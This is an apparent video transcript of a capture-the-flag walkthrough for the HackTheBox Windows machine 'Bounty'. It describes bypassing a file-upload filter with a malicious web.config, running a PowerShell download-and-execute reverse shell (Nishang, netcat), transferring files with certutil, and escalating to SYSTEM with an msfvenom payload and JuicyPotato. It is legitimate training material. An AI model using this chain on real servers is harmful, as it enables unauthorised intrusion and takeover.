Hi there everybody, my name is Ali and today we will be going to do Bounty from HackTheBox, and this is a Windows machine which is quite easy. So in the beginning what we're going to do is we will have a file upload functionality. We will try to bypass the file upload functionality by overwriting the Web.config file, and eventually we will get a reverse shell. After going through the reverse shell, we will going to have a privilege escalation in Juicy Potato, which is SEImpersonate Privilege. I don't know whether Juicy Potato will work, Lonely Potato will work. I will just do all of the things in front of you, or we might get any kernel exploitation as well in the privilege escalation. So that being said, let's jump in. I already have started the machine and my IP address is 10.10.10.93. So I will start off with the Nmap scan, Nmap-A for aggressive scan, -V for verbosity, and then the IP address of the target, which is 10.10.10.93. This can take some time to run, so I already have ran it. Looking at the results, we are having only port 80 open, and right here the service is HTTP, and I can see it is Microsoft IIS HTTPD 7.5. Now whenever I see Microsoft IIS 7.5, I will normally say that this might be a Windows 7 machine or Windows 8 machine or Windows Server 2008 or Windows Server 2012. So I'm right now just guessing up that based upon this version the operating system might be that's all. So HTTP title is Bounty, and I am having HTTP server header again, the same Microsoft IIS 7.5. HTTP methods, options, trace, get, head, post. Not interesting. If I was having something sort of put or delete or those sort of things, then I can try something malicious over here. But right now, I cannot do anything. So only port 80 open. So I will directly jump over to the browser and I will visit the site. And let's see what is right over here. And I can see that right now I'm having only a single image and nothing really interesting. If I go to Webalizer to see the technology, Webalizer says that ASP.NET. So I might be thinking that like in future I need to get a reverse shell. The shells which I will be going to take will be ASP or ASPX. So since the web server is quite low, I would go for ASP, but I am thinking that in my mind that okay, I will be going for ASP, no, not ASPX. So that's how I do my work actually. So now if I come back to my page source, let's see what is in the page source. I cannot see anything interesting in the comments. This is all CSS. Then here I am having an image, and the image name is really interesting. It says merlin.jpg. So Merlin can be a username enumeration right over here. So I will also keep this in my mind if I need somewhere username thing in the future. So nothing really interesting in the page source as well. So let's come back right over here, and the other thing is really nothing. So what I can do now is I can try to look for the files. Let's say if I'd say index file is present, the error says 404 file not found. So normally this is a ASP error, I believe. If I do index.php, index.asp, ASPX, and ASPX is giving me a different sort of error message. So server error in application, the resource cannot be found. So this is also a strange behavior. If I do ASPX1, different error, ASPX, we have a different error. So normally that is fine as well. So now I cannot manually brute force all of the payloads right over here or directories actually. So if the last one which I will try is robots.txt, and not found as well. So let's jump over to Gobuster. So now for directory fuzzing, I would recommend Gobuster, FUF, date search, all of the tools. The best one which I like to use is FUF. The other one after FUF, date search, and after date search, I'll normally use Gobuster. And I would recommend you that you should use all three tools onto single target. That is way more beneficial. So I will show you all of the syntaxes as well. So for Gobuster, we normally do Gobuster dir -u for URL, paste the URL in, and then the word list, which is user share word list. Then dirbuster directory list 2.3 medium.txt. Now normally, since this is a Windows machine and Windows is in case sensitive, so we can also try to change the word list right over here. So if I try to do something sort of, instead of medium.txt, I will try to do either lowercase medium.txt, because if it doesn't matter if it is lowercase or big case, so that depends. So I think so dash c is for colors, and let's hit enter and let's see. Okay, so I don't know whether it is dash c. That's fine, let's hit enter. So Gobuster will start, and it is quite slow right here. You can see only 0.11, 13 and so on. If we need to fast this scan, so what I can do is I can try to do threads, and I can try to do 100 threads, and this will be much more faster. And again, this depends upon your internet connection and your VPN connection. So going 100 threads is not much recommended, but still you can go if you are having a strong internet connection. So right now let's see whether we will find anything. If not, I'll try to do something interesting. Now what I recommend is that if your scan is done till 5% or 10%, just try to do something different. So this is the part of my methodology. So now you can see my scan is almost 10%. I have not found anything. I will just press Ctrl C, and now what I will do is I will try to do the same scan again, and this time I will put the extensions as well. And the extensions which I'll put is normally ASP and ASPX. So dash X for extension, ASP and ASP X. So I think so I need to put a dot as well. I don't know, but let's try. Now let's see what happens. And if these extensions will not work, I will try to change my tool, change my word list and so on. So I will use did search, then I will use FUF with different word lists as well. So sometimes that can be possible, but right away I can see I have got one endpoint which is transfer.aspx. So right away you noticed that what I did was previously I didn't did any extension, I didn't got anything. Now I did one extension, and that is ASP and ASPX, and right away I am having one page with 200 status code. So if I copy this from here, let's come to the browser and let's paste this over here, and let's see what it says. And here we have a file upload functionality. It says you need to upload a file, so I'll try to upload the file here as well. And I will, first thing first, I will analyze all the things going in my backend, which is I will start my Burp suite, I will turn on my proxy, go to HTTP history. Let me set the scope as well. So in the scope I will use add, and right here I will simply type in the IP address 10.10.10.93, click on OK, yes, re-enable proxy, and in the history. So now if I try to do something called, yeah, everything is fine. Let's try to upload a random image. So if I click on browse, I will go to my home, and in my home I am having test.jpg. So right here I will click on this one, I will click on upload, and it says file uploaded successfully. So let's come back and let's see what actually did happen in my backend. So if I go to repeater, send, and I need to render this functionality as well, but before rendering I think so I need to go to Burp's browser, and I need to allow browser to run without a sandbox. Check this one, send again, and now I think so I might be able to render, but let's see. Yes, so it says file uploaded successfully. Now I exactly don't know where my file has been uploaded, but the file has been uploaded successfully. So have we found any other thing in Gobuster? Nothing really interesting. Oh, right away I do got one thing interesting, that is uploaded files. So let's try to visit that endpoint and let's see what is over here. So uploaded files, and it is 403 forbidden. 403 forbidden means that this does exist, but we are not allowed to see that one. But again, we can try to do recursive directive brute forcing, or I know I have uploaded test.jpg, I believe. So yeah, test.jpg, I have uploaded it successfully. So let's try to see whether test.jpg is here or no. So enter. Doesn't look like. Let's try to do one more time. So if I click on send, it says file uploaded successfully. Let's try to refresh the page, and I do have an image. So now what I will be thinking, like, I think so that test.jpg is getting uploaded into the uploaded files, but it is getting deleted as well, like in after 1 minute or 2 minutes. So that is a problem for me. So let's try. So if I refresh the page now, the image is still here. Let's refresh the page now, still here. So after some time it will get removed, but let's see. If I do now, still here. Okay, so I will refresh the page next minute. So 23:38 I will refresh the page. So I'm just thinking like, okay, there is a time limit of 1 minute, so I need to upload the image, and after 1 minute the image will get deleted. So when 10:38 will be here, I will going to get a refresh. Sorry, 23:38. So refresh. Yeah, the image is still right over here. So that's fine. Now what I would be thinking, like, let's say whether I can upload any ASP extension, send. And again I got an error message. It says invalid file, please try again. So if I do ASPX, again invalid file, please try again. So now what I'm thinking, like, I cannot upload ASP or ASPX file, so I could get an easy reverse shell. So I need to figure out how either I can bypass this, or I need to do a lot of research. So there is 23:38. If I refresh the page, and the image is still here. So I think so it was a misconception that I got, but that's fine. So now the other thing that I will show you is that a website called exploit notes. I will visit this website, and actually I have not specified my certificate for Burp, so that's why I'm having this error, because on HTTPS website it will say, are you sure you want to go to this site? So that's so now I have switched off my proxy. Now it should work. And right here what I will do is I will say file upload, I believe, file upload attack. So allowed extensions for, I think so this is for Apache web server, PHP. I am interested in Windows, but the same thing can be retrieved from here as well. Like, it is trying to do double extension jpg.php. so let's try. So if I do something sort of jpg.aspx, invalid file, then I can try to do something sort of, yeah, double extensions are not working. If I do this afterwards, so .aspx, send. Oh, file uploaded successfully. So let's see what is in this file. First of all, let me see if this file is over here or no. Oh, this file is removed. So yes, there is a timer running up. I think so that might be 1 minute or 2 minutes. I have no idea exactly, but the file is gone. But I have uploaded a new one. So let's try to see what is this file does. Enter. And this file is not existing as well. Let's try to click send again. File uploaded successfully. Refresh the page, and that the same file is right over here. So that is also a problem. I have a bypass over here, but actually this is rendering as a JPEG. The other thing which I can try from the website over here is that it is trying to do null byte. So let me explain you what actually null byte is. So for example, this is the file exploit.php, then a null byte, and then .jpg. So what this will do is that the website will check that, okay, there is a .jpg extension into this file name, and the website will allow it to upload. When the file will get uploaded, null byte will actually terminate whatever is after it, right? So after termination of this part, the only part which will be left is this thing, this. So now our reverse shell is successfully uploaded onto the server. So that's what I will be going to do. So I will be trying to do something sort of test.aspx, then I will do a null byte %00.jpg, and let's see if this works. So let's come to Burp suite, change the file name, paste the new file name, click send, and file uploaded successfully again. So now if I try to come back over here, and if I will see if the file has been uploaded as test.aspx, enter, and it looks like that this file does exist, but I am having the same error message which I was having on index.aspx. So but it says uploaded file test.aspx, but I am having an error message of HTTP 404. So 404 means it is not found. If I try to do something sort of ASP and hit send, it gets uploaded as well. If I try to do ASP over here and not found, let's try one more time. ASP, not found. So something really strange is going on over here. If I do test.aspx, this is giving me a different error message. But still I need to somehow upload my reverse shell somehow. So let's see, these all are PHP reverse shells, HTML, PHP reverse shell for Windows, but this is not the one which I'm interested in. So I need to do a Google search. So one more thing which we can try is that if I'm not able to upload ASP or ASP extensions, I can try to upload .config file as well. And normally when we are having a IIS web server, there is a file called Web.config, which is holding the all configurations of the web server, that how the file will be uploaded and how the things will be going. So if I can try to upload config file, so if I, let's see, if I try to do web.config file and hit send, and I can see this file is getting uploaded as well. So if I copy this file name, come to the browser, request this page, and it says 500 internal server error. So this is again a different sort of error message, but that is fine. I think so that web.config file is getting uploaded successfully. So what I can do is I can say web.config reverse shell, and right here I am having web.config reverse shell from offensive reverse shell cheat sheet from GitHub, and then there is malicious, there is a blog post as well right over here. So let's see what this blog post is doing, and then we will see the reverse shell. So it says a web application security ninja, and I will try to see what it is doing. So it says this is the second part of my uploading web config file for fun and profit. I wrote the original blog post in 2014 which described method to run ASP classic code as well performing stored XSS on uploading web config file. So let's see what he is doing. So he is actually executing web.config as an ASPX page, and right here this is the reverse shell I believe he is doing. So this is web config file, these all are the configurations, and below that one it says that hey, you can upload your ASP code right over here. So this can be a good reverse shell for me. I can write my reverse shell or commands over here and try to upload and try to execute. So I think so that is the whole idea. Let's see what this reverse shell is, and that is exactly the same. So from line number 1 to 21, that is the configuration, and from line 21 to 24, that is the code where my reverse shell will get executed. And actually this is a precompiled reverse shell. This is executing command prompt /c for command, then PowerShell IEX, and then this is the path to the reverse shell. So I can try to actually play with this one. So let's copy this all. I will click on raw. I will copy the link, come to my terminal and wget. So web.config is right over here into my current working directory. I will not first of all go for direct reverse shell. So I will try to simply remove these all. Yeah, let's try to remove this all from here. And I'll try to do who am I, that's all. So I'll say cmd/c who am I. So it will execute who am I on command prompt. Save, and let's try to upload this onto the site. So I will again come to my browser and browse. I will go into my home, then I will go into HackTheBox, machines, bounty, web.config file, upload. File uploaded successfully. If I come over here, web.config, refresh the page, I didn't got anything right over here. So looks like I got a blank page. Page source is, I think so, page source is also not giving anything, but I can confirm that I can upload a web.config file, but I need to execute my whoami command. So that is strange that my whoami command doesn't got executed. I think so. Is there a extra line right over here? No. The other thing which I can do is, instead of who am I can try to ping myself. So ping 10 10 14 14. So this is a blind remote code execution. So let's write this. So I will again get web.config just to confirm. Yes, it is fine. Oh, I do have one mistake over here. There is a round bracket right over here. So let's try to change this thing. And I think so the previous one was also having a round bracket. So if I type in who am I, save now, let's try to upload it again. So browse, web.config, open, uploaded successfully, refresh the page. Still web, I cannot see any who am I command executed. So that is fine. Let's try to change this again. So now I will try to do cmd/c ping myself 10 10 14 14, save. Now if I browse, web config, open, upload, web.config. So before that I need to start my tcpdump. So tcpdump -i for interface tunnel 0, and I will say I want to intercept only ICMP requests which are ping requests. So let's refresh the page, come back, and there you go. So we have a blind injection. So my ping command is working, my whoami was not working, ping is working. So that is a good sign for me. So I will now directly jump over to the reverse shell. So this is how normally you test for remote code execution or blind RCE. So remote code execution, like if you are trying whoami and you don't know about like blind techniques, you can just miss this point. So that's why these things are extremely important for you. Now my next thing will be a reverse shell, and the reverse shell I will just do Control Z again and again because I want to get the original reverse shell, which was this one, which is PowerShell invoke expression new object net.web client download string and then the my web server. So I will remove this part only, 10 10 14 14 my local IP slash and invoke PowerShell tcp.ps1. And if you don't know what is invoke PowerShell tcp.ps1, this is a PowerShell reverse shell which is normally located, I think so I have installed it onto my Linux machine, but normally if you don't, I will show you how to do. So if that is in the Nishang GitHub repository, I normally like to do this thing. So I will do invoke and hit enter. And Nishang is a GitHub repository. I have cloned it onto my local system. So normally here is the reverse shell. So invoke PowerShell tcp.ps1 is the reverse shell for Windows, and this is in PowerShell. Now let's say if this command is not working for you, what you will be going to do is again going to Google Nishang GitHub. Right over here, what you will do is Right here you can see invoke PowerShell tcp.ps1. Either you can go from here or you can go to the original repository, and then you can go to the, I think so, shells. In the shells you will have invoke PowerShell tcp.ps1. so either you can download it from here or you can clone it onto your locally. So in my case I have cloned it. So what I will do is I'll simply copy the path, copy that path into my current working directory, and now I can modify it. So I will open it in Sublime Text, and right here to use Nishang reverse shell, what we need to do is we need to copy the example usage right over here, copy this thing, and I need to paste it at the bottom to actually this thing to work. So IP address will be my 10 10 14 14. My local port will be 443. I normally use port 443. So save this one, and now my reverse shell is ready. So what will happen now? So the thing which will happen now is that when this will get executed, it will download the invoke PowerShell tcp.ps1 reverse shell from my Python server. It will download onto the Windows machine, and then it will execute it onto the Windows machine. And once it is executed, I will be having a netcat listener on, and I will get a reverse shell. So that's the whole idea with what I am thinking now. So what I will do is I will first thing first start a Python server. So python-m http dot server on port 80. Then I will start a netcat listener on port 443. So netcat nvlp 443. So let's see whether this all things works here or no. So now again, browse, upload this web.conf file, open, upload, come back here, refresh the page, come back to terminal, and let's see. And there you go. I got a hit onto my server, and right away I got a hit onto my netcat listener. So what happened? Invoke PowerShell tcp.ps1 actually got downloaded from my server. After getting downloaded onto that Windows machine, it executed it, and after executing, I got a reverse shell. So this is how Nishang works, and most of the times I have been using Nishang in my every CTF, whether I have been doing the CTFs on HackTheBox, Try Hack Me, or any other thing. And even you can do it onto your exam like OSCP as well. This thing is extremely important. Okay, so now we are onto the box, and if I type in who am I am Merlin. Again, in the beginning I told you the name of the image Merlin, so this is the username actually. So for example, just like in the exams, you can be tricked into this thing because this is extremely important. Okay, so now I will try first thing first, who am I /all, to see my privileges, whether I'm a member of any strange group, whether I can do any interesting thing. So there are a lot of groups which I am a member of, and right here I am having SEImpersonate privilege as well. So for those of you, if you don't know what is SEImpersonate means that I am saying that, hey, I am administrator, give me access of this system. So that's in short what SEImpersonate is. But right now, who am I? I am not administrator, I am Merlin. So I'm actually tricking the Windows machine, and I'm saying that, hey Windows, I am administrator, can you please give me administrator access? And Windows will say, okay, you are administrator, here you go, I can give you administrator access. So this is just in short what SEImpersonate is. So if I am having this privilege enable, what I can try to do is I can try to exploit this, and I can try to become administrator. So that will be my first thing which I will try to do. If this doesn't work, I will try to go for, let's say, kernel exploits. So that will be a good thing as well. So if I try to do system info, let's see what happens. This is a x64 machine, and right away, as you know, in the beginning I told you Windows Server 2008 or 2012. So this is 2008. Okay, so let's target SEImpersonate, because I really don't like to go for kernel exploitation, because yeah, we can use Windows Exploit Suggester, and Windows Exploit Suggester can give us more than 10 exploits. So trying everyone one by one is a pain. So I'll try to go for SEImpersonate, because I know that there is a juicy potato exploit built for this one specifically, so that will be a good choice. So again, for SEImpersonate, to impersonate Windows as administrator, there is an exploit called juicy potato. So I'll go to Google, say juicy potato GitHub, and this one or anyone you want. Right here I am having, oh, let's go to the releases page, and here we have juicypotato.exe. So once it gets downloaded, I will transfer it into my current working directory. So starting the downloaded, download done. Let's come back over here. I will move it from my root downloads and then juicy potato into my current working directory. There it is. Start a Python server over here again, and I will transfer it right where I am. So I'm in the web root directory. So let's see if I can download it here or no. So first thing first, to download files onto Windows, I use certutil. If that doesn't work, then I will again use PowerShell. So certutil url cache -f http://10.10.14.14/ then the file name which I want to download and the file name again. So in short, I will say jp.exe and hit enter. And I got a hit onto my server, so this means that the file got downloaded successfully, but access is denied. So I cannot write the files over here, so I need to change my directory. So if I go to C drive, users, dir, Merlin, so if I type in whoami, I am already Merlin, so I can go into my Merlin, my home directory, and desktop, dir. Okay, there is no flag on the desktop. That is strange. So let's do the same command right over here, and let's see if I am having access. I should have, because this is my home directory. And there you go, online and command completed successfully. So now if I try to do dir, there is jp.exe. To run any executable file, we just need to put the name in the command prompt. No, this is PowerShell. So when we are doing PowerShell, we need to do /. If we are doing command prompt, I will just put name of the file. And there you go. This executable file is working absolutely fine. And we need to give the arguments that is -t to create process call with token and as user. And it says static for both. Now I don't know exactly what these two are, so I will use static. Program to launch, I will either do, like, you can say command prompt right here and then the port. So I can also use netcat as well. So let's see how things goes, because I don't know exactly how it will go. So the other thing which I can do is, let's try. So if I do /jp.exe, then I will do -t static and then program. I think so program will be a reverse shell, which will give me a reverse shell, because there is a port parameter here as well, -l. So I need to give the program and the port. So let's make a program with MSF Venom. That will be easy. So if I do MSF Venom -p for payload, Windows shell _reverse _tcp, and my local host will be 10.10.14.14. My local port will be 443, and the format will be exe, and the output file name, let's say shell.exe. So if you don't know how to run this command, or you have not memorized, is the easy way is you can go to refshells.com, and from refshell.com you can put your IP here, 10.10.14.14, port will be 443. You can click here to MSF Venom, and right here you will get already made commands. So just the one which I'm using right now in this case is this one. But again, looking at this one, I remember that this is a x64 machine, so I should have used x64. That is a mistake which I have made. So the one which I am using right here is this one. So I forgot to add x64. So let me copy paste this then again, and I will do that again. So copy right over here, and again I will remove my shell.txt, and this time I will simply paste the one copied from there. So I will rename it to shell.exe like this. So I will transfer that file over here as well, shell.exe. So let's start a Python server. Python server is on, and search util, again this thing, paste, and instead of juicy potato, shell.exe, and enter. So command completed successfully, dir, there is shell.exe. So let's try to now run. Let me do it like this. So netcat dash nvlp 443 again. I will run juicy potato. Then I will say that the dash t for static. Then I will say the program which I want to run is shell.exe, and the port is 443. So now let me explain you what juicy potato will do. Is the juicy potato will say that, hey Windows, I am administrator, can you run this shell.exe for me as an administrator? And Windows will check, okay, you are having SEImpersonate, and it will say that, okay, you are administrator, right? I will execute this shell.exe for you as an administrator. And when this shell.exe will get executed as administrator, I will get a reverse shell as administrator. So that's the whole idea. So if I hit enter, let's see what happens. And right away you see I got a reverse shell, and if I type in who am I am anti-authority system. So that's all about SEImpersonate. And whenever you are having SEImpersonate enabled, the right approach would be like you will go directly towards juicy potato. And since this was an old machine, that's why juicy potato. If the machines are quite updated like Windows 10 or Windows 11 or Windows Server 2019-16, then there is print spoofer that works like the same way. So now I can simply come into my home directory and I can grab the flag. So administrator, desktop, dir, and there is root flag. And regarding the user flag, I think so that might be again something interesting. So I need to find that as well, because if it was not present in the home directory of Merlin user, then definitely it should be somewhere. So one more thing which I can try to do is, let's see if I go into my Merlin home directory, dir, whether right here it is. No, so it should be on desktop, dir empty. That is strange. So one more thing which I can try to do is, might be possible I can try to see the hidden files. Might be possible that they have just made the flag hidden. So to see the hidden files, we can try to do attrib command, and attrib command will tell us that whether the files are hidden or no. And there you go, it says user Merlin desktop user.txt, and actually this file is hidden. So if I type, paste the path, and there you go, we have the user.txt. So it was present on the desktop, but it was hidden. So that was all about this video. I hope you will like it, and I will see you in the next video. Take care. Bye.